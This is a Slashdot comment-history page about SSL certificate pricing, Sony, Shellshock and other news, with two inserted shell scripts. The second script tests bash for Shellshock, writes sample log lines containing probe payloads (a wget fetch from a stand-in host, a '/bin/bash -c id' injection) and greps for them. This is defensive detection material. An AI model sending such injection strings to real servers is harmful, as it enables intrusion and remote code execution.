Comments

Google Proposes To Warn People About Non-SSL Web Sites

ArsenneLupin Re:Stupid (391 comments)

Huh. I didn't know that, as I only have ever done the individual verification. It's not uncommon for someone to wear many hats (i.e., to be affiliated with several organizations). It'd certainly be nice if their system allowed for a single individual account to switch between different "identities", so that one could issue certs for themselves or any number of organizations with which they're affiliated and which they've validated with StartSSL.

Indeed...

Have you suggested such an improvement to them?

Yes, of course. They wouldn't budge. Their suggestion: just use the "free" plan instead, there you can wear as many hats as you like (which I did... after this incident they never saw another cent from me). Weird way of promoting your business...

And that's another issue: they don't take any suggestions! For example: some (all?) of their automated mails are formatted as a single long line. I suggested to them that general usage is to stay below 78 characters per line. Should be easy to fix, as they probably use some kind of .txt template, where they could just insert a couple of breaks. Answer: well, at least our mails don't contain a virus (or something equally silly). Hey that's great! But it would be even nicer if the lines were shorter as well. A year afterwards, the issue was still not fixed.

Technically, yes, but policy-wise, no: Class 1 certs are not intended for commercial use.

Well, it's not commercial use, it's for several non-profits and one political party.

As you suspected, the $9 offering from PositiveSSL is for a single, non-wildcard, non-SAN certificate.

Yeah, that's the kind of certificate that you can get for free from StartSSL (class 1)

NameCheap also sells Comodo PositiveSSL multi-domain certs [namecheap.com] for $30/year for up to 100 domains, which is quite a reasonable price.

Yeah, that would be reasonable. Can these domains be wildcard, or does each domain only have a single host?

Wildcard certs are also available [namecheap.com], with Comodo wildcards costing $94/year.

Interesting...

2 days ago

Google Proposes To Warn People About Non-SSL Web Sites

ArsenneLupin Re: Stupid (391 comments)

Yeah. Beer in Switzerland isn't cheap. :/

I know. So expensive that people cannot even afford mustard to put on their sausage along with it ...

2 days ago

Top Five Theaters Won't Show "The Interview" Sony Cancels Release

ArsenneLupin Re:Home of the brave? (580 comments)

... or maybe the theater owners (and Sony) do not actually believe the threats, but instead fear that many spectators might believe those threats, and performance on opening might be very lackluster... Better cancel it altogether, and do it 2 weeks later when there are (hopefully...) no new threats.

3 days ago

Top Five Theaters Won't Show "The Interview" Sony Cancels Release

ArsenneLupin Re:Home of the brave? (580 comments)

Well actually, if you are going to be killed by a terrorist at some point during the day, you would have to wake up alive first.

The terrorist could conceivably kill you in your sleep, with a single shot at your head through your pillow...

3 days ago

Google Proposes To Warn People About Non-SSL Web Sites

ArsenneLupin Re:Malware (391 comments)

I see the value of the proposal: it is easy to inject malware inside a HTTP stream.

Only when the attacker is sitting on the path from the browser to the server. Not when listening in on the side-lines.

... and sitting on the path is the exact definition of man-in-the-middle, which allows one to take advantage of poor certificates. And how many people properly understand certificates?

However, with only 33% of sites being SSL enabled, they are just going to show warnings everywhere, and users will quickly learn to ignore them.

Exactly. And once users are trained to ignore warnings, they will ignore them too if they are about bad certificates, so nothing is gained (see above).

3 days ago

Google Proposes To Warn People About Non-SSL Web Sites

ArsenneLupin Re:Stupid (391 comments)

StartSSL offers completely free-of-cost certificates that are widely recognized by browsers to individuals and non-commercial sites. $60/year gets you an ID-verified account and the ability to offer unlimited certificates (they only charge for the validation, certificates are free). A second $60 ($120 total) gets your organization verified, again with the ability to issue unlimited certs.

And if you do pay the $60, you can only manage a single legal entity. Which means, if you are the certificate manager of some organization, you can either get certificates in the name of that organization (after completing the paperwork and paying the additional $60), or for your own private sites, but not for both at once. Yes, after completing the paperwork for getting certificates for your organization, you lose the right to get certificates for yourself. Crazy, but true!

Oddly enough, if you don't pay anything at all ("class 1 certificates"), you can get certificates for several associations and yourself at once. Of course, then you can't get wildcards or SAN certificates, so you are forced to use SNI (more hassle to set up, and might not work with exotic browsers).

If, for some reason, that's not satisfactory, Comodo resellers like NameCheap offer PositiveSSL certs for less than $9/year. That's less than a beer at the local bar.

Wow, a place where beer is even more expensive than here in Luxembourg! But seriously, I guess the $9/year is for plain certificates, non-wildcard and non-SAN? In that case it would compete with StartSSL's free offering, rather than their $60 plan. If it actually does include wildcard certificates, I would be interested in details.

3 days ago
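An added example, not from any of the comments above: the three certificate shapes this thread compares (single host, wildcard, multi-domain/SAN) differ only in what the certificate signing request asks the CA to sign. The script below builds one CSR of each kind with openssl and reads the requested names back, so you can see exactly what a "non-wildcard, non-SAN" request looks like next to the other two. The example.org hostnames and the file labels are placeholders, and the keys are throwaway 2048-bit RSA keys.

```shell
#!/bin/sh
# Added example; not code from the thread or from any CA. Requires openssl.
# make_csr DIR LABEL CN SAN  -> writes DIR/LABEL.key and DIR/LABEL.csr
#   SAN is a subjectAltName value such as "DNS:a.example.org,DNS:b.example.org",
#   or empty for a plain single-host (or wildcard-CN) request.
make_csr() {
    dir=$1; label=$2; cn=$3; san=$4
    conf="$dir/$label.cnf"
    {
        printf '[req]\nprompt = no\ndistinguished_name = dn\n'
        if [ -n "$san" ]; then printf 'req_extensions = v3_req\n'; fi
        printf '[dn]\nCN = %s\n' "$cn"
        if [ -n "$san" ]; then printf '[v3_req]\nsubjectAltName = %s\n' "$san"; fi
    } > "$conf"
    openssl req -new -newkey rsa:2048 -nodes -keyout "$dir/$label.key" \
        -out "$dir/$label.csr" -config "$conf" 2>/dev/null
}

# csr_dns_names FILE -> one line per name the CSR asks for: the CN first,
# then every DNS: entry of the subjectAltName extension, if there is one.
csr_dns_names() {
    openssl req -in "$1" -noout -text 2>/dev/null |
        grep -o -E 'CN ?= ?[^,/ ]+|DNS:[^, ]+' |
        sed 's/^CN *= *//; s/^DNS://'
}

# Stand-alone demo: one CSR of each kind discussed in the thread.
if command -v openssl >/dev/null 2>&1; then
    work=$(mktemp -d)
    make_csr "$work" single   www.example.org ""
    make_csr "$work" wildcard '*.example.org' ""
    make_csr "$work" san      example.org \
        'DNS:example.org,DNS:www.example.org,DNS:*.dev.example.org'
    for kind in single wildcard san; do
        echo "$kind.csr asks for:"
        csr_dns_names "$work/$kind.csr" | sed 's/^/  /'
    done
    rm -rf "$work"
fi
```

The single-host CSR carries one name, the wildcard one carries a CN with a leading `*.`, and the multi-domain one carries a CN plus a subjectAltName list; a CA doing domain validation has to validate every listed name, which is why the cheaper offerings restrict the shape. It is also why SNI comes up in the thread: with only single-host certificates, each name on a shared IP needs its own certificate, and the server can only pick the right one if the client sends the hostname in the TLS handshake.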

Verizon "End-to-End" Encrypted Calling Includes Law Enforcement Backdoor

ArsenneLupin Re:This should be free (166 comments)

And if the source and destination are clueless then an educated third party has to manage it.

... an educated and trustworthy third party. And that's where it becomes difficult...

4 days ago

Sony Pictures Computer Systems Shut Down After Ransomware Hack

ArsenneLupin Re:oh goody (155 comments)

I really hope they don't pay!

I hope so too. That way, the hackers will release the files (the contents, not just the filenames), which contain enough juice to sink Sony Pictures (and possibly other parts of Sony too) for good.

about a month ago

Sony Pictures Computer Systems Shut Down After Ransomware Hack

ArsenneLupin Re:Dear Sony, I am delighted! (155 comments)

every officer of the company needs to do the honorable thing and leave the company, leave the industry, and get a job more suited to their ethical and strategic skill set. Like flipping burgers, or arranging the sushi on the platter.

Are you sure these are appropriate jobs for Sonyscum? Personally, I wouldn't want to eat burgers laced with Ex-Lax, or sushi caught from the waters next to Fukushima...

about a month ago

"Barbie: I Can Be a Computer Engineer" Pulled From Amazon

ArsenneLupin Re:Fix a thumbdrive virus by doing WHAT??? (561 comments)

The suggestion in the book that it would be appropriate to plug a known-virus-infected USB thumbdrive into another computer in order to fix it seems totally crazy to me. Even if the second computer does have better security there's no guarantee the virus isn't a new one that hasn't made it into virus checker recognition databases yet...

Yeah, but you forgot an important detail... The suggestion was not just to plug it into another computer, but to plug it into another computer that isn't yours. In case it does become infected, you just sneak away, and pretend that nothing happened...

But only if you're a boy. If you're a girl, you just keep sitting next to it and weep...

about a month ago

Rooftop Solar Could Reach Price Parity In the US By 2016

ArsenneLupin Re:They WILL FIght Back (516 comments)

Everybody knows wind turbines are eye sores.

They obscure all the lovely smoke stacks.

A couple of years back, the French complained that a new wind turbine field in Germany was spoiling the nice scenic view of the Chateau de Malbrouck (located just opposite the German-French border from that infamous field).

Unfortunately, they conveniently completely forgot what the Germans see when they look at the Chateau de Malbrouck

about a month ago

Apple Disables Trim Support On 3rd Party SSDs In OS X

ArsenneLupin Re:This isn't new (327 comments)

When you qualify it by saying, "always on third party SSDs", then it's not the same as "always" (unqualified).

But he did:

Apple has always disabled TRIM on those

So, what's your point?

about a month ago

Ask Slashdot: Single Sign-On To Link Google Apps and Active Directory?

ArsenneLupin Re:What the hell (168 comments)

If you are turning north from I-10 onto I-65, or if you are on I-65 and turning east or west onto I-10, you have already failed at taking the quickest way from anywhere to anywhere else.

Just looking at a map, while coming from North I-65 and going east on I-10 looks kinda nonsensical, going west doesn't look so bizarre. You'd use that connection when going from Montgomery to New Orleans, wouldn't you?

Or is that just a general comment that those roads tend to be congested, and are never the quickest way (no matter which way you turn?)

about a month and a half ago

"Police Detector" Monitors Emergency Radio Transmissions

ArsenneLupin Ambulances are using the same technology (215 comments)

In many places, ambulances and firefighters are using the same technology. So expect some false positives...

about 2 months ago

How Nigeria Stopped Ebola

ArsenneLupin Re:Not the same thing at all. (381 comments)

The current panic underscores it as well - first people underreact and now they are overreacting.

The swine flu scare a couple of years ago may also be an explanation for the initial under-reaction...

about 2 months ago

Why the Trolls Will Always Win

ArsenneLupin Re:The more things change the more the stay the sa (728 comments)

"politic" meaning roughly in the original Greek "To shout down"

Bullshit. The word "politic" is derived from "polis", the Greek word for "city". So "politics" is the art of running a city (or city-state, as most cities were back then), not the art of shouting your opponent down...

about 2 months ago

Building a Honeypot To Observe Shellshock Attacks In the Real World

ArsenneLupin Just grep for () in your /var/log/apache2/referer. (41 comments)

If you run a web server of any kind, just grep for () in your /var/log/apache2/referer.log, and you'll see plenty of hits:
fgrep '()' /var/log/apache2/referer.log

... if not, maybe you're simply running a site that is too obscure?

about 3 months ago

Remote Exploit Vulnerability Found In Bash

ArsenneLupin Re:Only CGI scripts affected? (399 comments)

Oh, I had the same thought... I mean, by the time an "attacker" is modifying arbitrary environment variables in your process,

Which is the case on most Apache Web server configs: the client has full control over the HTTP_REFERER and HTTP_USER_AGENT variables... And the exploit in question works with any environment variable, including those 2.

Well, starting from here, you are vulnerable as soon as:

  1. You have a CGI script written as a #!/bin/bash script on your system
  2. You have /bin/sh symlinked to /bin/bash (used to be common in many Linux distributions), so as soon as a script calls system(), /bin/bash gets executed, along with the script's full environment...

about 3 months ago

Remote Exploit Vulnerability Found In Bash

ArsenneLupin Re:Really? Using bash for CGI? (399 comments)

The problem affects any CGI that *calls* bash, which means any call to system() in any language is going to cause a problem.

Nowadays, on most systems, /bin/sh is a proper Bourne Shell (either ash or dash), and no longer bash. So system() should no longer be an issue, but explicitly calling bash still would be...

about 3 months ago
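An added example, not from the thread: a small sh script that performs the checks the last three comments describe. It reports what /bin/sh actually resolves to (the system() point), tests whether the local bash still runs code trailing an exported function definition (using HTTP_USER_AGENT as the carrier, since a CGI request controls that variable), and compares the quick `fgrep '()'` from the referer-log comment with a tighter signature on constructed log lines. The four log lines are made up for the demo, not real traffic, and use documentation IP ranges.

```shell
#!/bin/sh
# Added example, not code from the comments above. Sample log lines below
# are constructed for the demo; nothing here touches a real web server.

# Does /bin/sh resolve to bash (so system() hands the CGI environment to
# bash) or to a plain Bourne shell such as dash or ash?
sh_implementation() {
    target=$(readlink -f /bin/sh 2>/dev/null || printf '%s' /bin/sh)
    case "$(basename "$target")" in
        bash*) echo bash ;;
        dash|ash|busybox*) echo bourne ;;
        *) echo other ;;
    esac
}

# Does the local bash still execute code appended to an exported function
# definition? A CGI request controls HTTP_USER_AGENT, so that is the carrier.
bash_env_function_check() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    out=$(env HTTP_USER_AGENT='() { :;}; echo INJECTED' bash -c 'echo ok' 2>/dev/null)
    case "$out" in
        *INJECTED*) echo vulnerable ;;
        *) echo patched ;;
    esac
}

# Write a small Apache combined-format log (constructed): lines 1 and 3 are
# Shellshock probes, line 2 is benign, line 4 merely contains "()".
write_sample_log() {
    cat > "$1" <<'EOF'
203.0.113.5 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 200 12 "-" "() { :;}; echo; /bin/bash -c 'id'"
198.51.100.7 - - [25/Sep/2014:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "http://example.org/" "Mozilla/5.0"
203.0.113.9 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 404 0 "() { :; }; wget http://198.51.100.7/x" "() { :; }; /bin/sh -c 'uname -a'"
192.0.2.4 - - [25/Sep/2014:10:00:04 +0000] "GET /search?q=f() HTTP/1.1" 200 99 "-" "curl/7.38.0"
EOF
}

# The quick grep from the thread: any "()" at all. Catches the probes, but
# also an innocent request line.
naive_hits() {
    grep -c -F '()' "$1"
}

# Tighter signature: a quoted header field that begins with "() {", the
# function-export syntax the exploit abuses.
shellshock_hits() {
    grep -c -E '"\(\) \{[^"]*"' "$1"
}

# Stand-alone run.
log=$(mktemp)
write_sample_log "$log"
echo "/bin/sh resolves to: $(sh_implementation)"
echo "local bash function-import check: $(bash_env_function_check)"
echo "lines containing '()' at all: $(naive_hits "$log")"
echo "lines with a header field starting '() {': $(shellshock_hits "$log")"
rm -f "$log"
```

On the constructed log the loose pattern reports 3 lines and the tighter one 2, which is the difference between "my site gets probed" and a list you can actually feed into a blocklist. The bash check prints "patched" on any bash with the function-import fix applied; on an unpatched one the injected echo runs before the `-c` command.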

Submissions


Luxembourg PM Juncker to resign over spy scandal

ArsenneLupin writes  |  about a year and a half ago

ArsenneLupin (766289) writes "Luxembourg will hold new elections after Prime Minister Jean-Claude Juncker announced he would resign following a secret service scandal.

Mr Juncker, Europe's longest-serving head of government, told parliament he would step down on Thursday."


Luxembourg Prime Minister Resigns over Spying Scandal

ArsenneLupin writes  |  about a year and a half ago

ArsenneLupin (766289) writes "Luxembourg Prime Minister Jean-Claude Juncker, Europe's longest-serving leader, Wednesday said he would step down over a scandal involving the small country's small secret services, who were alleged to have created a "big mess" by indulging in a spate of misconduct on his (or rather: Mister Mille's...) watch.

When will president Obama follow suit?"


Pope Benedict XVI resigns due to old age

ArsenneLupin writes  |  about 2 years ago

ArsenneLupin (766289) writes "In a statement released by the Catholic Church, Benedict XVI said that “after having repeatedly examined my conscience before God, I have come to the certainty that my strengths, due to an advanced age, are no longer suited to an adequate exercise of the Petrine ministry.”
Hopefully the new pope (if there will be any...) will be more open-minded and tolerant of minorities"


Journals

ArsenneLupin has no journal entries.
